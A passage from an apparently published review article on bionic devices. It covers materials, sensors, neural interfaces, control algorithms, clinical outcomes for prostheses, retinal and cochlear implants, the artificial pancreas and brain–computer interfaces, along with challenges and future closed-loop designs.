<p>Emerging organic semiconductors have further enabled neuromorphic HCIs. For instance, 6,13-bis (triisopropylsilylethynyl)pentacene (TIPS-pentacene) was selected in Zhang et al. for its narrow bandgap (∼1.6 eV), which allows photon absorption across the visible spectrum [11]. Its high carrier mobility and optical transparency made it ideal for constructing a retina-like phototransistor array that mimics the broadband response of photoreceptors. TIPS-pentacene also exhibits synaptic plasticity under repeated light stimulation, enabling short-term visual memory tasks and demonstrating how material choice directly determines device intelligence. In short, TIPS-pentacene functions as a photoactive organic semiconductor that provides both light detection and learning-like behavior within neuromorphic retinal systems.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="199" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-4-1024x199.jpeg" alt="" class="wp-image-4560" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-4-1024x199.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-4-300x58.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-4-768x149.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-4-1000x194.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-4-230x45.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-4-350x68.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-4-480x93.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-4.jpeg 1234w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 6: Innovation timeline (2020–2025) highlighting selected advances from the reference set. Key milestones include the open-source bionic leg (2020) [6], prosthetic touch and kinesthesia integration (2021) [3], a clinically deployed neural-controlled bionic hand (2023) [1], and reinforcement learning control for dexterous hand function (2024) [12].</p>



<p>2. Metals and Ceramics for Osseointegration: In HCI limbs, titanium alloys are the gold standard for osseointegration due to their high strength, corrosion resistance, and biocompatibility. Surface treatments (e.g., hydroxyapatite coatings) promote bone ingrowth, enabling long-term skeletal anchoring [15]. The percutaneous feedthroughs enabled by titanium implants also provide a stable, infection-resistant pathway for electrodes, addressing the long-standing problem of percutaneous connectors in neural prostheses.</p>



<ol start="2" class="wp-block-list"></ol>



<h4 class="wp-block-heading">B. Sensors and Actuators</h4>



<p>Bionic devices rely on sensors to detect environmental stimuli and actuators to reproduce biological motion.</p>



<ol class="wp-block-list">
<li>MEMS and Soft Sensors: Miniaturized Microelectromechanical Systems (MEMS) enable high-resolution detection of forces, pressures, and accelerations. In prosthetic hands, MEMS pressure sensors embedded in fingertips translate tactile stimuli into electrical signals that can be delivered back to the nervous system [3]. For lower-limb devices, Inertial Measurement Units (IMUs) allow real-time detection of gait phases, enabling adaptive damping in microprocessor knees.</li>
</ol>



<p>Soft sensors based on conductive hydrogels or liquid metals are increasingly integrated into prosthetic liners, providing conformal detection of skin strain and residual limb pressure. These sensors improve socket fit monitoring and help prevent skin breakdown.</p>



<ol start="2" class="wp-block-list">
<li>Actuation Systems: Historically, prosthetic actuation relied on DC motors, which are bulky and energy-inefficient. Recent approaches explore series elastic actuators, which integrate elastic elements to store and release energy, improving safety and compliance during human–robot interaction. Shape Memory Alloys (SMAs) and Dielectric Elastomer Actuators (DEAs) offer biomimetic muscle-like contraction, although their power efficiency and thermal properties remain challenges.</li>
</ol>



<p>In the context of the artificial pancreas, actuators are miniaturized insulin pumps capable of delivering subcutaneous doses with millisecond precision. The accuracy of these pumps, combined with continuous glucose monitoring, underpins the safety of closed-loop systems [23].</p>



<h4 class="wp-block-heading">C. Neural Interfaces</h4>



<p>The neural interface is the critical bottleneck for high-performance bionic systems, as it governs the bandwidth of communication between the user and the device.</p>



<ol class="wp-block-list">
<li>Non-Invasive vs. Invasive Interfaces: Non-invasive techniques such as surface EMG and EEG (Electromyography and Electroencephalography) are safe but limited by poor signal-to-noise ratio. In contrast, invasive methods such as intraneural electrodes, epimysial implants, and cortical arrays offer high bandwidth but risk tissue damage and long-term instability.</li>
</ol>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="439" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-5-1024x439.jpeg" alt="" class="wp-image-4561" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-5-1024x439.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-5-300x129.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-5-768x330.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-5-1000x429.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-5-230x99.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-5-350x150.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-5-480x206.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-5.jpeg 1165w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 7: Material-to-function mapping: examples include TIPS-pentacene → neuromorphic vision; titanium → osseointegration; MEMS → tactile/proprioception; series elastic actuators → compliant actuation; shape-memory polymers (SMP) → hybrid nerve interfaces.</p>



<p>The hybrid nerve interface proposed by Cho et al. exemplifies a middle ground [7]. By combining regenerative peripheral nerve interfaces (muscle grafts reinnervated by nerve endings) with a shape memory polymer buckle, the system stabilized nerve–electrode contact over 29 weeks in rabbits. This design achieved stable bidirectional communication—demonstrating both sensory recording and robotic leg control—suggesting that hybrid constructs may resolve the trade-off between invasiveness and stability.</p>



<ol start="2" class="wp-block-list">
<li>Osseointegration as a Neural Gateway: Ortiz-Catalan et al. demonstrated that osseointegrated implants could act not only as skeletal anchors but also as percutaneous conduits for neural signals [1]. By routing electrode wires through titanium fixtures integrated into the radius and ulna, they achieved stable myoelectric recording and direct neural stimulation for more than three years in daily use. This dual role of osseointegration—as both a mechanical interface and a neural gateway—represents a major advance in long-term clinical viability.</li>



<li></li>
</ol>



<h4 class="wp-block-heading">D. Computational Algorithms and Decoding</h4>



<ol start="4" class="wp-block-list"></ol>



<p>Advances in machine learning have transformed bionic control from binary, sequential commands to rich, continuous decoding of intent.</p>



<ol class="wp-block-list">
<li>Pattern Recognition and Regression: Early myoelectric prostheses employed simple thresholding: one muscle contraction to open the hand, another to close. Modern devices employ pattern recognition algorithms (support vector machines, linear discriminants) trained on multichannel EMG to decode a variety of gestures. Regression-based approaches enable proportional control, translating EMG amplitude directly into joint torque or velocity.</li>
</ol>



<ol start="2" class="wp-block-list">
<li>Reinforcement Learning (RL): A major innovation is the use of reinforcement learning for prosthetic control. Schone et al. implemented an RL framework with a “Guitar Hero”-like training game, where users received real-time feedback as they attempted specific hand gestures [12]. Over time, the system adapted both to user variability and electrode drift. The RL-based controller achieved double to triple the accuracy of supervised learning, particularly for simultaneous multi-finger movements. This demonstrates how adaptive algorithms can overcome the limitations of static calibration</li>
</ol>



<p>TABLE IV: Technological Innovations Underpinning Modern Bionic Devices</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Domain</td><td>Innovation</td><td>Key Mechanism /Material</td><td>Problem Solved</td><td colspan="2">Representative Study</td></tr><tr><td>Materials</td><td>TIPS-pentacenephototransistors</td><td>Narrow bandgap organic semiconductor</td><td>Broadband visibleabsorption; synaptic plasticity</td><td>Zhang</td><td>Zhang et al.(2023) [11]</td></tr><tr><td>Materials</td><td>Titanium osseointegration</td><td>Biocompatible alloy with bone integration</td><td>Stable skeletalanchoring; neuralfeedthrough</td><td colspan="2">Ortiz-Catalan et al.(2023) [1]</td></tr><tr><td>Sensors</td><td>MEMS tactile arrays</td><td>Miniaturized pressure sensors</td><td>High-resolutiontouch feedback</td><td colspan="2">Marasco et al.(2021) [3]</td></tr><tr><td>Actuators</td><td>Series elastic actuators</td><td>Elastic compliance elements</td><td>Safe interaction;energy efficiency</td><td>Clites</td><td>Clites et al.(2020) [6]</td></tr><tr><td>Neural Interfaces</td><td>Hybrid nerve interface + SMP buckle</td><td>Muscle graft +shape memorypolymer</td><td>Stable long-termnerve–electrodecontact</td><td>Cho</td><td>Cho et al.(2023) [7]</td></tr><tr><td>Algorithms</td><td>Reinforcement learning control</td><td>Adaptive policy optimization</td><td>Improved multi-DoF accuracy</td><td colspan="2">Schone et al.(2024) [12]</td></tr><tr><td>Algorithms</td><td>Memristor neuromorphic retina</td><td>Non-volatile resistive elements</td><td>Low-powerin-sensorpreprocessing</td><td>Long</td><td>Long et al.(2023) [10]</td></tr></tbody></table></figure>



<ol start="3" class="wp-block-list">
<li>Neuromorphic and Memristor-Based Processing: Neuromorphic circuits emulate biological synapses and neurons in hardware. Memristors—resistive devices whose state depends on prior activity—are well-suited for synaptic plasticity. In bionic vision, memristor arrays handle in-sensor preprocessing, filtering noise and adapting to light without external processors, reducing latency and power use. Their non-volatility and scalability enable compact, low-power integration on flexible substrates. A neuromorphic retina can thus perform edge detection or motion tracking directly, similar to how biological retinas preprocess visual input.</li>
</ol>



<h4 class="wp-block-heading">E. Integration of Artificial Intelligence</h4>



<p>Artificial intelligence (AI) extends beyond decoding to the holistic control of closed-loop systems. In the artificial pancreas, AI-based controllers predict insulin needs using historical glucose patterns, exercise levels, and meal timing [23]. In bionic limbs, deep learning models can classify EMG signals in real time, while reinforcement learning adapts to new conditions without retraining, continuously improving performance over extended use.</p>



<p>The integration of AI also facilitates user-specific personalization. Each patient’s physiology, residual limb anatomy, and lifestyle are unique; AI enables prostheses to learn individual preferences, adjust grip force for common tasks, anticipate fatigue, or predict gait transitions under different terrains. Such adaptive capabilities reduce cognitive burden on the user and improve naturalistic embodiment of the device.</p>



<p>As computing hardware becomes more compact and energy-efficient, these algorithms are increasingly embedded on-device, reducing latency and dependence on external computers. This mirrors the neural efficiency of biological systems, which integrate sensing, computation, and actuation locally. Looking ahead, the convergence of AI with neuromorphic hardware and flexible bioelectronics promises to create prostheses that operate autonomously, respond seamlessly to environmental changes, and evolve alongside the user’s daily needs.</p>



<h2 class="wp-block-heading">V. Clinical Applications and Outcomes </h2>



<p>The ultimate measure of success for any bionic technology lies not in laboratory demonstrations but in clinical effectiveness and real-world adoption. In this section, we examine the outcomes of bionic limbs, sensory prostheses, and organ-level devices in patients. This section emphasizes rehabilitation results, usability, quality of life improvements, and challenges revealed in long-term use.</p>



<h4 class="wp-block-heading">A. Bionic Limbs in Clinical Use</h4>



<ol class="wp-block-list">
<li>Upper-Limb Prostheses: Clinical trials of advanced upper-limb prostheses have demonstrated functional restoration, reduction in phantom limb pain, and increased quality of life. Ortiz-Catalan et al. reported a transradial neuromusculoskeletal prosthesis used continuously for more than three years [1]. Functional scores improved significantly: Southampton Hand Assessment Procedure (SHAP) scores increased by 23%, while pain interference with daily life decreased by more than 50%. Importantly, the user reported being able to wear the device comfortably throughout the day, an outcome rarely achieved with socket-based systems.<br><br>Marasco et al. studied two patients with targeted reinnervation and closed-loop feedback [3]. Integration of touch, kinesthesia, and motor control allowed participants to perform tasks with visuomotor behaviors indistinguishable from able-bodied individuals. They no longer had to fixate visually on the prosthetic hand, freeing attention for higher-level planning. This demonstrates not only functional restoration but also a shift toward naturalistic embodiment.</li>



<li>Lower-Limb Prostheses: Lower-limb prostheses are judged by metrics such as walking speed, energy expenditure, and stability on varied terrain. Microprocessor knees consistently improve gait symmetry and reduce falls compared to mechanical knees [6]. Powered prostheses such as the OSL enable active ankle push-off, reducing metabolic cost of walking. Early clinical trials show transfemoral amputees can achieve walking speeds approaching those of able-bodied controls.Osseointegrated lower-limb prostheses also demonstrate marked improvements in mobility. A long-term Swedish cohort study showed that more than 90% of patients reported improved prosthetic comfort, stability, and walking endurance compared to sockets [15]. However, risks such as infection and implant loosening persist.</li>
</ol>



<h4 class="wp-block-heading">B. Bionic Eyes</h4>



<ol start="2" class="wp-block-list"></ol>



<p>Retinal prostheses such as Argus II have provided basic functional vision to hundreds of blind individuals worldwide [5]. Clinical outcomes show patients can detect light sources, navigate high-contrast environments, and recognize large objects. However, resolution is limited (about 60 electrodes), and many users report “pixelated” vision.</p>



<p>More recent neuromorphic retinal devices remain at the preclinical stage but show transformative potential. Long et al. demonstrated that a perovskite nanowire retina achieved filter-free color discrimination and wide-field imaging in laboratory models [10]. Similarly, Zhang et al. reported that their organic phototransistor retina exhibited plasticity and visual memory, features that could translate to more naturalistic visual experiences [11]. While these results have not yet reached human trials, they suggest a trajectory toward functionally rich vision restoration.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="926" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-6-1024x926.jpeg" alt="" class="wp-image-4562" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-6-1024x926.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-6-300x271.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-6-768x694.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-6-1000x904.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-6-230x208.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-6-350x316.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-6-480x434.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-6.jpeg 1165w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 8: Clinical outcome radar across device categories (illustrative 0–10 scales). Limb outcomes reflect neuromusculoskeletal prosthesis and closed-loop feedback studies [1], [3]; speech perception for ears from cochlear implant literature [22], [24]; HbA1c control from artificial pancreas trials [23]; independence and dexterity improvements from BCI work [13], [14].</p>



<h4 class="wp-block-heading">C. Cochlear Implants and Auditory Prostheses</h4>



<p>Cochlear implants are the most clinically established bionic devices, with decades of long-term outcome data. Studies consistently show that recipients achieve near-normal speech perception in quiet environments, with 80–90% of adult users able to understand conversational speech [22], [24]. Pediatric recipients implanted before the age of two can develop speech and language skills comparable to hearing peers, underscoring the importance of early intervention.Limitations remain in music perception and speech-in-noise environments. Fine structure processing algorithms have partially addressed these gaps, while emerging optogenetic cochlear implants offer the possibility of finer frequency resolution by stimulating auditory neurons with light rather than electricity [24]. Though still in early trials, such devices could overcome the channel interaction limits of electrode arrays.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="647" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-7-1024x647.jpeg" alt="" class="wp-image-4563" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-7-1024x647.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-7-300x190.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-7-768x485.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-7-1000x632.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-7-230x145.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-7-350x221.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-7-480x303.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-7.jpeg 1165w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 9: Patient-centered benefits vs. limitation severity (illustrative 0–10). Scores are synthesized from clinical and review reports across limbs [1], [3], [15], eyes [5], [10], [11], ears [22], [24], organs [23], and BCIs [13], [14].</p>



<h4 class="wp-block-heading">D. Artificial Pancreas</h4>



<p>The artificial pancreas has advanced from inpatient feasibility studies to widespread outpatient use. Closed-loop systems integrating continuous glucose monitors and insulin pumps have demonstrated significant clinical benefits.</p>



<p>In the Cambridge Artificial Pancreas trials, adults and adolescents with type 1 diabetes using closed-loop control spent over 70% of the day in target glucose range, compared to about 50% with conventional therapy [23]. HbA1c levels improved by approximately 0.5%, and hypoglycemia episodes were reduced by more than 40%. These results have led to regulatory approval of hybrid closed-loop systems (Medtronic 670G, Tandem Control-IQ).</p>



<p>Beyond diabetes, closed-loop bioelectronic devices for hypertension and epilepsy are under investigation, suggesting that the artificial pancreas is a prototype for a broader class of organ-level bionics.</p>



<h4 class="wp-block-heading">E. Brain–Computer Interfaces in Clinical Translation</h4>



<p>BCIs are increasingly being tested in patients with paralysis. Hochberg et al. demonstrated that tetraplegic individuals could use cortical implants to control robotic arms with multiple degrees of freedom, achieving self-feeding tasks [14]. More recently, bidirectional BCIs delivering somatosensory feedback via cortical stimulation have restored not only motor intent but also tactile perception in paralyzed patients [13].</p>



<p>Non-invasive BCIs, while less precise, have enabled basic communication in locked-in syndrome. EEG-based spellers, though slow, offer a lifeline for individuals otherwise unable to interact with their environment. Clinical usability, however, remains limited by low bandwidth and the need for expert calibration.</p>



<p>TABLE V: Summary of Clinical Outcomes in Major Bionic Devices</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Device / System</td><td>Clinical Outcomes</td><td>Patient-Reported Impact</td><td>Limitations</td></tr><tr><td>Neuromusculoskeletalarm [1]</td><td>Improved SHAP score(+23%); reducedphantom pain</td><td>Daily wear; reduceddisability</td><td>Surgical risk;infection</td></tr><tr><td>Touch + kinesthesiaprosthesis [3]</td><td>Natural visuomotorbehavior; improveddexterity</td><td>Prosthesis ownership;intuitive use</td><td>Requires surgicalreinnervation</td></tr><tr><td>Microprocessorknees [6]</td><td>Improved gaitsymmetry; fewer falls</td><td>Higher confidence;mobility</td><td>Cost; battery life</td></tr><tr><td>Osseointegratedprosthesis [15]</td><td>Increased walkingendurance; comfort</td><td>Longer wear times;better stability</td><td>Infection risk</td></tr><tr><td>Argus II retinalimplant [5]</td><td>Light detection; objectlocalization</td><td>Independence innavigation</td><td>Low resolution</td></tr><tr><td>Perovskite/organicretinas [10], [11]</td><td>Preclinical visionrestoration; color vision</td><td>Potential fornaturalistic vision</td><td>Not yet in clinicaltrials</td></tr><tr><td>Cochlearimplant [22], [24]</td><td>Near-normal speech inquiet</td><td>Major quality of lifeimprovement</td><td>Music and noiselimitations</td></tr><tr><td>Artificialpancreas [23]</td><td>HbA1c reduction; &gt;70%time in range</td><td>Reduced cognitiveburden</td><td>Device cost;calibration</td></tr><tr><td>Cortical BCI [13],[14]</td><td>Multi-DoF roboticcontrol; sensoryrestoration</td><td>Restoredindependence intasks</td><td>Invasive surgery;stability issues</td></tr></tbody></table></figure>



<h4 class="wp-block-heading">F. Patient Perspectives and Usability Studies</h4>



<p>Across device types, patient-reported outcomes highlight both the benefits and limitations of bionic devices:</p>



<ul class="wp-block-list">
<li>Users of osseointegrated prostheses report higher comfort and daily wear time but express concerns about infection risk [15].</li>



<li>Cochlear implant recipients overwhelmingly report improved quality of life, but many remain dissatisfied with music enjoyment [24].</li>



<li>Bionic limb users often emphasize the importance of intuitive control and sensory feedback, without which devices are often abandoned [3].</li>



<li>Artificial pancreas users report reduced cognitive burden, as the system automates much of the constant decision-making in diabetes care [23].</li>
</ul>



<h2 class="wp-block-heading">VI. Challenges and Limitations </h2>



<p>While recent years have witnessed transformative advances in bionic technology, clinical translation remains constrained by significant technical, biological, and regulatory challenges. These limitations underscore the gap between laboratory performance and long-term, real-world usability.</p>



<h4 class="wp-block-heading">A. Technical Challenges</h4>



<ol class="wp-block-list">
<li>Signal Reliability and Noise: Surface EMG, EEG, and even implanted electrodes are subject to signal drift, noise, and instability over time. Sweat, skin impedance, and electrode displacement degrade surface signals, while implanted electrodes may shift microscopically due to tissue remodeling. These issues lead to loss of calibration, forcing frequent retraining of pattern-recognition algorithms [3]. Reinforcement learning approaches partially address this, but stable long-term decoding remains elusive.</li>
</ol>



<ol start="2" class="wp-block-list">
<li>Power Supply and Energy Efficiency: Most prosthetic systems rely on rechargeable lithium-ion batteries, which add weight and require frequent charging. High-resolution bionic eyes and neural stimulators demand significant power for continuous operation, yet miniaturized power systems remain limited. Energy harvesting from body motion, thermoelectric gradients, or biofuel cells has been explored but is not yet clinically viable.</li>
</ol>



<ol start="3" class="wp-block-list">
<li>Durability and Mechanical Robustness: Devices implanted in the body must withstand years of mechanical stress. MEMS sensors, polymer electrodes, and microelectronics may degrade under physiological conditions. Similarly, osseointegrated implants must tolerate repetitive load-bearing without loosening. Failures not only compromise device function but may necessitate surgical revision, which carries additional risk [15].</li>
</ol>



<ol start="4" class="wp-block-list">
<li>Limited Bandwidth of Neural Interfaces: Even state-of-the-art cortical arrays record from a few hundred neurons, far below the millions involved in natural motor control. Intraneural electrodes provide some selectivity but risk damaging nerve fascicles. As a result, current devices cannot yet replicate the information throughput of the intact nervous system, restricting fine dexterity and natural sensory richness [1], [3].</li>
</ol>



<h4 class="wp-block-heading">B. Biological and Clinical Challenges</h4>



<ol class="wp-block-list">
<li>Immune Response and Biocompatibility: Foreign-body response to implanted electrodes leads to fibrotic encapsulation, increasing impedance and reducing signal quality over time. Flexible polymers (polyimide, parylene-C) mitigate this mismatch, but chronic inflammation remains a barrier to decades-long stability [9]. Similarly, neural tissue is highly sensitive; intraneural arrays risk long-term axonal degeneration.</li>
</ol>



<ol start="2" class="wp-block-list">
<li>Infection Risk in Osseointegration: Osseointegrated prostheses solve socket issues but leave a skin breach vulnerable to infection, despite titanium’s biocompatibility and antimicrobial coatings [15]. For many surgeons, this is the key clinical barrier to adoption.</li>
</ol>



<ol start="3" class="wp-block-list">
<li>User Variability: Each patient presents unique residual anatomy, nerve distribution, and physiology. This heterogeneity makes one-size-fits-all solutions impractical. A prosthesis calibrated for one individual may fail in another with different EMG signal distribution. Personalized adaptation through AI offers promise but requires extensive data and user training [12].</li>
</ol>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="705" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-8-1024x705.jpeg" alt="" class="wp-image-4564" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-8-1024x705.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-8-300x207.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-8-768x529.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-8-1000x688.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-8-230x158.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-8-350x241.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-8-480x330.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-8.jpeg 1165w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 10: Challenge severity heatmap (0–10) across technical, biological, and ethical domains. Entries are informed by clinical/engineering overviews [9], osseointegration cohorts [15], device and interface reports [1], [3], and neurotechnology ethics guidance [25].</p>



<ol start="4" class="wp-block-list">
<li>Rehabilitation and Training Burden: Complex bionic devices demand intensive rehabilitation. For example, users of targeted reinnervation prostheses must undergo weeks of training to learn new muscle–nerve mappings [3]. Without structured rehabilitation, even advanced devices risk abandonment. Successful adoption also depends on continuous feedback from clinicians, adaptive training software, and strong patient motivation. Limited access to rehabilitation resources further compounds these challenges, highlighting the need for more intuitive control strategies and scalable support systems.</li>
</ol>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="342" height="572" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.55.10-PM.png" alt="" class="wp-image-4565" style="width:257px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.55.10-PM.png 342w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.55.10-PM-179x300.png 179w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.55.10-PM-230x385.png 230w" sizes="(max-width: 342px) 100vw, 342px" /></figure>



<p> Fig. 11: Failure pathway flowchart: signal noise/drift → calibration loss → poor usability → device abandonment.</p>



<h4 class="wp-block-heading">C. Ethical and Regulatory Challenges</h4>



<ol class="wp-block-list">
<li>Accessibility and Equity: Advanced prostheses such as neuromusculoskeletal arms or retinal implants cost tens of thousands of dollars, often exceeding insurance coverage. As a result, access is restricted to high-resource healthcare systems, leaving a vast majority of potential users worldwide without benefit.</li>



<li>Privacy and Data Security: Brain–computer interfaces generate continuous neural data streams, raising concerns about privacy, surveillance, and misuse. Questions of ownership and protection of neural data are critical as BCIs move toward commercial use [25].</li>



<li>Regulatory Uncertainty: Regulatory frameworks (FDA, EMA) struggle to classify hybrid devices that combine hardware, software, and surgical procedures. Is a neuromusculoskeletal prosthesis a medical device, an implant, or a drug–device combination? These uncertainties slow approval processes and complicate clinical translation.</li>



<li>Psychological and Social Factors: Bionic devices affect not only physiology but also identity. While many users embrace prostheses as part of their body schema, others experience alienation. High expectations, fueled by media portrayals of “superhuman cyborgs,” may lead to disappointment when real devices fall short. Social stigma and lack of support also contribute to device abandonment [17].</li>
</ol>



<p>TABLE VI: Challenges and Limitations of Bionic Devices Across Categories</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Device Category</td><td>Technical Challenge&nbsp;</td><td>BiologicalChallenge</td><td>Ethical/RegulatoryChallenge</td></tr><tr><td>Bionic Limbs</td><td>Signal drift; limitedbandwidth</td><td>Infection risk(osseointegration)</td><td>High cost; limitedaccessibility</td></tr><tr><td>Bionic Eyes&nbsp;</td><td>Low resolution; highpower use</td><td>Retinal scarring(implants)</td><td>Limited approvalpathways</td></tr><tr><td>CochlearImplants</td><td>Limited frequencyresolution</td><td>Variable outcomes inlate-deafened users</td><td>Access inlow-incomecountries</td></tr><tr><td>ArtificialPancreas</td><td>Sensor lag; pumpprecision</td><td>Skin reactions tosensors</td><td>Insurance coverage;affordability</td></tr><tr><td>Brain–ComputerInterfaces</td><td>Low neuronsampling; instability</td><td>Neural tissuedamage;encapsulation</td><td>Privacy of neuraldata; unclearregulation</td></tr></tbody></table></figure>



<h4 class="wp-block-heading">D. Toward Overcoming Limitations</h4>



<p>Efforts to address these limitations include:</p>



<ul class="wp-block-list">
<li>Flexible bioelectronics that minimize immune response [11].</li>
</ul>



<ul class="wp-block-list">
<li>Antimicrobial and regenerative coatings for osseointegration [15].</li>
</ul>



<ul class="wp-block-list">
<li>On-device AI that adapts to signal drift in real time [12].</li>
</ul>



<ul class="wp-block-list">
<li>Energy harvesting systems that exploit body heat or motion [20].</li>
</ul>



<ul class="wp-block-list">
<li>Ethical frameworks for neural data protection being drafted by international bioethics committees [25].</li>
</ul>



<p>While none of these solutions is definitive, the rapid pace of interdisciplinary research suggests that many current barriers may be partially overcome within the next decade.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="891" height="594" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-9.jpeg" alt="" class="wp-image-4566" style="width:500px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-9.jpeg 891w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-9-300x200.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-9-768x512.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-9-230x153.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-9-350x233.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-9-480x320.jpeg 480w" sizes="(max-width: 891px) 100vw, 891px" /></figure>



<p>Fig. 12: Conceptual framework for the Future of Bionics. The figure highlights five major domains expected to shape ongoing advances: Advanced Prostheses, AI &amp; Control, Sensing &amp; Feedback, Clinical Translation, and Integration.</p>



<h2 class="wp-block-heading">VII. Future Directions </h2>



<p>The future of bionic devices lies in the pursuit of seamless human–machine integration, where artificial systems are no longer merely tools but functional extensions of the body. This vision depends on advances across materials science, neuroscience, artificial intelligence, and clinical medicine. The following subsections outline key directions for research and development.</p>



<h4 class="wp-block-heading">A. Closed-Loop Systems</h4>



<p>One of the most transformative frontiers in bionics is the realization of closed-loop systems that integrate sensing, computation, and actuation in a continuous feedback cycle. Current devices often operate in open-loop: users send motor commands, but feedback is limited or absent. This mismatch increases cognitive burden and reduces naturalism.</p>



<ol class="wp-block-list">
<li>Closed-Loop Limb Prostheses: Future prostheses will combine multimodal sensory feedback (touch, proprioception, temperature) with real-time motor decoding. For example, Ortiz-Catalan’s osseointegrated system demonstrates that stable long-term recording and stimulation are possible [1]. The next step is to expand sensory channels, potentially incorporating thermal sensors like those proposed in thermally sentient limb prototypes [8].</li>
</ol>



<ol start="2" class="wp-block-list">
<li>Closed-Loop Vision: Neuromorphic retinas already integrate preprocessing [10], [11]. Coupled with cortical implants capable of delivering spatially distributed stimulation, future bionic eyes may offer continuous adaptive vision, adjusting to light conditions, motion, and attention demands.</li>
</ol>



<ol start="3" class="wp-block-list">
<li>Closed-Loop Organ Devices: The artificial pancreas exemplifies the power of closed-loop design, and similar architectures may be applied to renal replacement (bionic kidney) or cardiac regulation (bioelectronic pacemakers with adaptive control). These devices would monitor physiological parameters continuously and autonomously adjust output, minimizing user intervention.</li>
</ol>



